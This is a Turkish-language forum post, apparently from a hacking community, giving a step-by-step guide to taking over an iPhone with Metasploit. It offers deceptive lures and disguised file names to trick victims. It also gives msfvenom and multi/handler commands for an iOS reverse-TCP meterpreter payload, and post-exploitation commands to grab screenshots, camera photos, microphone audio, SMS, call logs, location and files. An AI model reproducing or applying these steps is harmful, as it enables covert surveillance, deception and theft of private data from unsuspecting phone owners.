iPhone’a Metasploit ile Sızma
Cümleten Selamün Aleyküm
Kali Linux Toolu Metasploit ile nasıl İphone cihaza Sızılır
Cümleten Selamün Aleyküm
Kali Linux Toolu Metasploit ile nasıl İphone cihaza Sızılır
1. Adım: Sosyal Mühendislik (En önemli kısım)
iPhone kullananları kandırmak biraz daha zor. En çok çalışan yöntemler şunlar:
-
-
- Apple hediye kartı kazandın
- iCloud fotoğraf sızıntısı diye link atma
Dosya ismini çok normal koyun mesela: photo.jpg.ipa veya video_goster.ipa
2. Adım: RAT Dosyasını Üretme
Kali’de terminali açın ve şunu yazın:
msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=buraya_kendi_ip LPORT=4444 -o gizli.ipa
YADA
msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=192.168.1.35 LPORT=4444 -o video.ipa
Kendi ip’nizi öğrenmek için ifconfig yazabilirsiniz.
3. Adım: SERVER Açma
Yeni terminal açıp şu komutları girin:
msfconsole
use exploit/multi/handler
set payload apple_ios/aarch64/meterpreter_reverse_tcp
set LHOST 192.168.1.35
set LPORT 4444
Şimdi bekleyin. Kurban ipa’yı kurup açınca burada session gelecek.
4. Adım: Sızınca Kullanabileceğiniz Komutlar
Session açıldığında şu komutları deneyebilirsiniz:
- sysinfo → telefonun bilgilerini gösterir
- screenshot → ekran fotoğrafı çeker
- webcam_snap → kamera ile fotoğraf çeker
- record_mic 10 → 10 saniye ses kaydı alır
- dump_sms → sms’leri alır
- dump_calllog → arama kayıtlarını alır
- geolocate → konum bilgisi verir
- download resim.jpg → dosyayı indirir
Örnek kullanım:
sysinfo
screenshot
cd /var/mobile/Media/DCIM
ls
download IMG_0001.JPG
Önemli Notlar:
- Jailbreak’li iPhone’larda işler daha kolay oluyor.
- Normal iPhone’larda (jailbreak’siz) ipa kurdurmak baya zor.
- Güncel iOS’larda (16-17-18) bu yöntem genelde pek çalışmıyor.
- En büyük iş sosyal mühendislikte. İyi kandırırsanız şansınız artar.
SAYGILAR....
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
